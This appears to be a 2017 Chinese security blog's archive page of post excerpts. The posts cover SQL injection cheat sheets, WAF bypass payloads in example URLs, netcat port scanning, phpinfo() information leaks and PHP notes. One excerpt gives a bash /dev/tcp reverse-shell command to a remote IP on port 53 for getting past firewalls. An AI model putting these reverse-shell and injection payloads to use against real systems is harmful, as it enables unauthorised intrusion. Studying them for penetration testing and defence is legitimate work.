2017年7月28日

摘要: MySQL SQL Injection Cheat Sheet Some useful syntax reminders for SQL Injection into MySQL databases… This post is part of a series of SQL Injection Ch 阅读全文
posted @ 2017-07-28 00:11 _Deen 阅读(447) 评论(0) 推荐(0) 编辑
摘要: ``` Reverse Shell Cheat Sheet If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell. If it’s n... 阅读全文
posted @ 2017-07-28 00:10 _Deen 阅读(467) 评论(0) 推荐(0) 编辑

2017年7月26日

摘要: Linux下反弹shell笔记 0x00 NC命令详解 在介绍如何反弹shell之前,先了解相关知识要点。 nc全称为netcat,所做的就是在两台电脑之间建立链接,并返回两个数据流 可运行在TCP或者UDP模式,添加参数 —u 则调整为udP,默认为tcp \ v 参数,详细输出 n参数高数net 阅读全文
posted @ 2017-07-26 01:11 _Deen 阅读(10821) 评论(0) 推荐(0) 编辑
摘要: ``` 最近在搞反向连接,试来试去发现最好的工具还是nc。正好趁这个机会把nc的用法总结一下: 1.端口扫描: nc vv ip port 例:nc vv 192.168.1.1 5000 扫描192.168.1.1的tcp 5000端口 nc vv w secs ip port port 例:nc 阅读全文
posted @ 2017-07-26 00:01 _Deen 阅读(802) 评论(0) 推荐(0) 编辑

2017年7月24日

摘要: ``` phpinfo()想必的最熟悉的了,在搭建环境之后都会随后写一个 phpinfo()来测试环境是否正常,很多人测试完毕忘记删除就开始部署环境了,这就造成了一些敏感信息的泄漏。那么我们能从 phpinfo()中获得哪些敏感信息呢?php 版本这种就不用说了,来看一下泄漏了哪些比较敏感的信息。 一、绝对路径(_SERVER[“SCRIPT_FILENAME”]) 这个是最常用,也是最有效的一... 阅读全文
posted @ 2017-07-24 16:48 _Deen 阅读(1663) 评论(0) 推荐(0) 编辑
摘要: ``` 基本/简单绕过方法: 1、注释符 http://www.0dayhack.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4…. 2、使用大小写 http://www.0dayhack.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4…. 3、结合前面两种方法 http://ww... 阅读全文
posted @ 2017-07-24 16:39 _Deen 阅读(355) 评论(0) 推荐(0) 编辑
摘要: session会话机制介绍如下 http是无状态协议。服务器靠cookie和session来记住用户。$_SESSION 和 $_GET等一样,是超全局变量。 后台脚本里面会写: session() start 。会话开始。所以,当浏览器访问一个页面时,session机制就开始了。这个时候机制会生成 阅读全文
posted @ 2017-07-24 10:56 _Deen 阅读(1022) 评论(0) 推荐(0) 编辑
摘要: php学习笔记 引用赋值 8种类型 1. 整型 2. 布尔型 3. 浮点型 4. 字符串 5. 数组 6. 对象 7. 资源类型 8. 空类型 var_dump()输出变量的值和类型 整型变量声明: 以0开头表示以八进制声明一个变量,以0x开头表示以十六进制声明一个变量。整数的最大值 4字节,2的3 阅读全文
posted @ 2017-07-24 10:55 _Deen 阅读(223) 评论(0) 推荐(0) 编辑
该文被密码保护。 阅读全文
posted @ 2017-07-24 10:45 _Deen 阅读(2) 评论(0) 推荐(0) 编辑
摘要: shell反弹 由于防火墙策略,导致并不能按预期的反弹shell,端口被封禁,可以使用53端口进行反弹shell 命令如下: bash c 'sh i & /dev/tcp/210.28.30.887/53 0 &1' nc监听本地53端口即可 阅读全文
posted @ 2017-07-24 10:09 _Deen 阅读(199) 评论(0) 推荐(0) 编辑

导航